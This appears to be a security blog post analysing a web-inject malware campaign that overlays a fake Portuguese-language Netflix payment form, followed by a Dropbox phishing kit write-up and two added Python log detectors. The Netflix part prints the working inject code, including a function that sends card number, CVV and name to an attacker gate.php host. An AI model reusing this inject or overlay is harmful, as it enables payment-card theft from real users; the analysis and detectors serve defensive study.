
Tag: fraud

NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms all over the world, especially because of its “hottest” TV series. This popularity has also attracted criminals looking for new ways to steal money. During the last months Netflix has been targeted by malware written to steal credit card information and user credentials. The attack uses the same technique used by financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits until the user loads the Netflix login page. As soon as the browser loads the page content from the server, the malware injects its malicious HTML, JavaScript and CSS into it.

The inject is activated for GET or POST requests on *netflix.com*:

set_url *netflix.com/* GP

where G = GET and P = POST

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
}
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
}
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
}
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
}
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
}
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
} 
JavaScript code

.....

function submitMe(){ 
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        document.getElementById("cc_number").focus();
        return false;
    }else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           document.getElementById("cc_number").focus();
           return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        document.getElementById("cc_month").focus();
        return false;
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        document.getElementById("cc_year").focus();
        return false;
    } 
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        document.getElementById("cc_ccv").focus();
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        document.getElementById("cc_name").focus();
        return false;
    }

var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
head.appendChild(script_);
setCookie("WeAre", "Foda", 365);
hide('popDiv');
}

......
HTML code


<div class="ontop" id="popDiv">

<div id="popup">
   <center>
   <img src= "https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png"width="128">
  </center>

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possível confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para
 continuar.

<form id="cc_form" name="cc_form">

<table width="100%">

<tr>

<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>

 </tr>


<tr>

<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>


<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>

 </tr>


<tr>

<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>

 </tr>

 </table>

<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
 </form>

 </div>

</div>


To see how the malware interacts with the user, we can inject the code ourselves in the browser once the Netflix login page is loaded.

The malware checks whether the inserted credit card number is valid or not.

With a valid credit card number it is possible to submit the request, triggering the submitMe() JavaScript function shown above.
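The exfiltration request built by submitMe() is a plain GET with the card data in the query string, which makes it visible to an egress proxy. The following detector is an added example, not code from the original post: it applies the same Luhn test the inject uses to every query-string value in a constructed proxy log and flags Luhn-valid card numbers sent to any host other than the assumed first-party Netflix domains.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not from the original post): "<ts> <client> <method> <url>".
# Line 2 mirrors the inject's gate.php request; 4111 1111 1111 1111 is a test PAN that passes Luhn.
SAMPLE_LOG = """\
2016-10-17T14:54:52Z 10.0.0.12 GET https://www.netflix.com/login
2016-10-17T14:55:03Z 10.0.0.12 GET https://p0o9i8u7y9.xyz/braz2/gate.php?CC=4111111111111111&month=12&year=19&cvv=123&name=JOAO
2016-10-17T14:55:10Z 10.0.0.12 GET https://assets.nflxext.com/ffe/siteui/akira/svg/icons.svg
2016-10-17T14:56:00Z 10.0.0.13 GET https://example.org/search?q=4111
"""

FIRST_PARTY = {"netflix.com", "nflxext.com"}  # assumed first-party domains, skipped here
PAN_RE = re.compile(r"^\d{13,19}$")
CVV_KEYS = {"cvv", "cvc", "ccv", "cc_ccv"}

def luhn_ok(digits):
    """Luhn checksum, the same test the inject's valid_credit_card() applies before sending."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right, subtract 9 above 9
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def check_url(url):
    """Return a finding if the query string carries a Luhn-valid PAN to a third-party host."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if any(host == d or host.endswith("." + d) for d in FIRST_PARTY):
        return None
    params = parse_qs(parts.query)
    pans = [v.replace(" ", "") for vals in params.values() for v in vals
            if PAN_RE.match(v.replace(" ", "")) and luhn_ok(v.replace(" ", ""))]
    if not pans:
        return None
    return {"host": host, "path": parts.path, "pan_last4": pans[0][-4:],
            "cvv_present": any(k.lower() in CVV_KEYS for k in params)}

def scan_log(log_text):
    """Parse the constructed proxy format and collect one finding per exfil-looking request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) == 4 and (hit := check_url(fields[3])):
            hit.update(ts=fields[0], client=fields[1], method=fields[2])
            findings.append(hit)
    return findings
```

The same check applied to POST bodies would catch injects that switch from a script tag to a form submission; here only the query string is inspected, as in this sample.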


Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the online sharing and storage platform is currently in circulation. The scam invites readers to view files shared by another Dropbox user and to click on a link that redirects to a phishing website.

However, this phishing scam actually tries to fool users into submitting the username and password of their email account (Yahoo, Outlook, Gmail, AOL or others) in order to gain access to that account.


Clicking on one of the icons opens a modal asking for credentials.

Once the credentials are filled in and the “Submit” button is clicked, they are sent by email to the phisher.

By analyzing the web server it is possible to retrieve the clone kit used by the attacker to build the phishing website. The clone kit is very simple and was developed with basic programming skills. Below are the structure of the kit and the source code of submit.php; “form.php” and “index.php” are 99% HTML.

[Screenshot: directory structure of the clone kit and source code of submit.php]

The developer downloaded all the icons and serves them locally, to avoid recon.

[Screenshots: locally hosted icon files of the clone kit]

Dropbox could easily identify this phishing attack by analyzing the HTTP Referer header of incoming requests, because the phishing website redirects the victim to the official Dropbox website.
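As an added example (not part of the original post), this is the kind of check the Referer observation above suggests on the legitimate site's side: parse constructed Apache combined-format access log lines for the login page, keep the Referer hosts outside an assumed allowlist, and count hits per host. The phishing kit's own hostname shows up as the referer of the post-submission redirect.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed Apache combined-format lines as the legitimate site would see them
# (not real Dropbox logs); the Referer is the page that sent the visitor to /login.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [13/Oct/2016:11:27:40 +0000] "GET /login HTTP/1.1" 200 5120 "http://dropbox-shared-files.example/form.php" "Mozilla/5.0"
203.0.113.9 - - [13/Oct/2016:11:27:41 +0000] "GET /login HTTP/1.1" 200 5120 "https://www.dropbox.com/home" "Mozilla/5.0"
203.0.113.7 - - [13/Oct/2016:11:28:02 +0000] "GET /login HTTP/1.1" 200 5120 "http://dropbox-shared-files.example/form.php" "Mozilla/5.0"
198.51.100.4 - - [13/Oct/2016:11:29:15 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.5 - - [13/Oct/2016:11:30:00 +0000] "GET /login HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Assumed allowlist: the site's own domain plus referers expected to be benign.
TRUSTED_REFERER_DOMAINS = {"dropbox.com", "google.com"}
LOGIN_PATH = "/login"

def is_trusted(host):
    """True when host is a trusted domain or one of its subdomains (whole-label match)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_REFERER_DOMAINS)

def brand_lookalike(host):
    """Untrusted host that embeds the brand name, e.g. dropbox-shared-files.example."""
    return "dropbox" in host.lower() and not is_trusted(host)

def suspicious_referers(log_text):
    """Count login-page hits per untrusted Referer host; a kit that redirects its
    victims to the real site makes its own hostname show up here."""
    hits = Counter()
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        req = m.group("req").split()
        path = req[1] if len(req) > 1 else ""
        if path != LOGIN_PATH or m.group("ref") == "-":
            continue
        ref_host = urlsplit(m.group("ref")).hostname or ""
        if ref_host and not is_trusted(ref_host):
            hits[ref_host] += 1
    return dict(hits)
```

Referer is sent by most browsers on a redirect but can be suppressed by the sending page, so this is a cheap signal for triage rather than a complete detection.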
